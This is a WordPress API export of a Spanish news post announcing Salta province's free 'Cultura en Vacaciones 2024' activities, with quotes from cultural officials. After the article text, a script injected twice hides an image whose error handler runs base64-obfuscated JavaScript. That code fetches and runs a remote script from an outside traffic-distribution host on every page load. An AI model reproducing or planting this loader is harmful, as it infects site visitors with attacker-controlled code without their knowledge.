{"id":3484,"date":"2024-01-09T22:54:12","date_gmt":"2024-01-10T01:54:12","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3484"},"modified":"2025-08-14T00:02:31","modified_gmt":"2025-08-14T03:02:31","slug":"actividades-recreativas-para-saltenos-y-turistas-propuestas-por-cultura","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3484","title":{"rendered":"Actividades recreativas para salte\u00f1os y turistas propuestas por Cultura"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-0c0aa5bb5a45ce1f686c471dfd083afb\" style=\"background-color:#05517d\"><em>Talleres, juegos, espect\u00e1culos de m\u00fasica y danza son algunas de las propuestas que se ponen a disposici\u00f3n de salte\u00f1os y turistas sin l\u00edmite de edad en los diferentes espacios de la Secretar\u00eda de Cultura de la Provincia durante los meses de enero y febrero.<\/em><\/h4>\n\n\n\n<p>El ciclo Cultura en Vacaciones 2024 propone un calendario de actividades para todo p\u00fablico que se realizar\u00e1n hasta el 24 de febrero en los diferentes espacios de la Secretar\u00eda de Cultura y en m\u00e1s de 28 municipios de la provincia. Tambi\u00e9n, durante ese periodo, los museos provinciales tendr\u00e1n entrada libre y gratuita para salte\u00f1os y residentes en Salta.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"899\" height=\"600\" data-id=\"3485\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5742-presentacion.jpg\" alt=\"\" class=\"wp-image-3485\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5742-presentacion.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5742-presentacion-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5742-presentacion-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5742-presentacion-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5742-presentacion-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"899\" height=\"600\" data-id=\"3486\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5741-presentacion.jpg\" alt=\"\" class=\"wp-image-3486\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5741-presentacion.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5741-presentacion-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5741-presentacion-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5741-presentacion-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5741-presentacion-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"899\" height=\"600\" data-id=\"3487\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5740-presentacion.jpg\" alt=\"\" class=\"wp-image-3487\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5740-presentacion.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5740-presentacion-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5740-presentacion-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5740-presentacion-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5740-presentacion-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u201cEl calendario propone repensar la Cultura como un lugar de encuentro con actividades para toda la familia. Se trata de una propuesta que busca acercar nuestras ra\u00edces para que las nuevas generaciones se sientan tan orgullosos como nos sentimos nosotros\u201d expres\u00f3 la ministra de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda,<strong>&nbsp;Cristina Fiore<\/strong>&nbsp;en el acto de lanzamiento del ciclo.<\/p>\n\n\n\n<p>Y continu\u00f3: \u201ces lindo reencontrarnos con nuestra historia, tender lazos con nuestro pasado para reconocer de d\u00f3nde venimos y compartirlo a trav\u00e9s de diferentes actividades pensadas para todo el p\u00fablico, salte\u00f1os y turistas, nietos, abuelos, padres. Las actividades gratuitas representan un esfuerzo muy grande que hace la Provincia y queremos ponerlas&nbsp;a disposici\u00f3n de los salte\u00f1os para que los disfruten en familia\u201d se\u00f1al\u00f3 Fiore.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Cultura propone actividades recreativas para salte\u00f1os y turistas\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/97OKcZJgoRM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>En tanto, el secretario de Cultura,<strong>&nbsp;Diego Ashur<\/strong>, manifest\u00f3: \u201cestamos muy contentos de anunciar las diferentes actividades culturales con las que contar\u00e1n salte\u00f1os y turistas para disfrutar del verano en Salta\u201d; y agreg\u00f3 que \u201cel calendario cuenta con la presencia de m\u00e1s de 28 municipios que dan cuenta del car\u00e1cter federal y participativo del Gobierno de la Provincia\u201d.<\/p>\n\n\n\n<p>Por \u00faltimo, Ashur agradeci\u00f3 a los diferentes equipos de trabajo con quienes articularon actividades que involucran artesanos, artistas, talleristas, capacitaciones en diferentes artes y la participaci\u00f3n de cuerpos estables de la provincia en diferentes espacios representativos de la Cultura en Salta.<\/p>\n\n\n\n<p>En el link, situado debajo del video relacionado y&nbsp;denominado \u00abArchivo de Descarga\u00bb,&nbsp;se puede acceder al calendario de actividades.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/actividades-recreativas-para-saltenios-y-turistas-propuestas-por-cultura-93633\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Talleres, juegos, espect\u00e1culos de m\u00fasica y danza son algunas de las propuestas que se ponen a disposici\u00f3n de salte\u00f1os y turistas sin l\u00edmite de edad en los diferentes espacios de la Secretar\u00eda de Cultura de la Provincia durante los meses de enero y febrero. El ciclo Cultura en Vacaciones 2024 propone un calendario de actividades [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3486,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3484","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3484"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3484"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3484\/revisions"}],"predecessor-version":[{"id":6879,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3484\/revisions\/6879"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3486"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3484"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3484"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3484"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}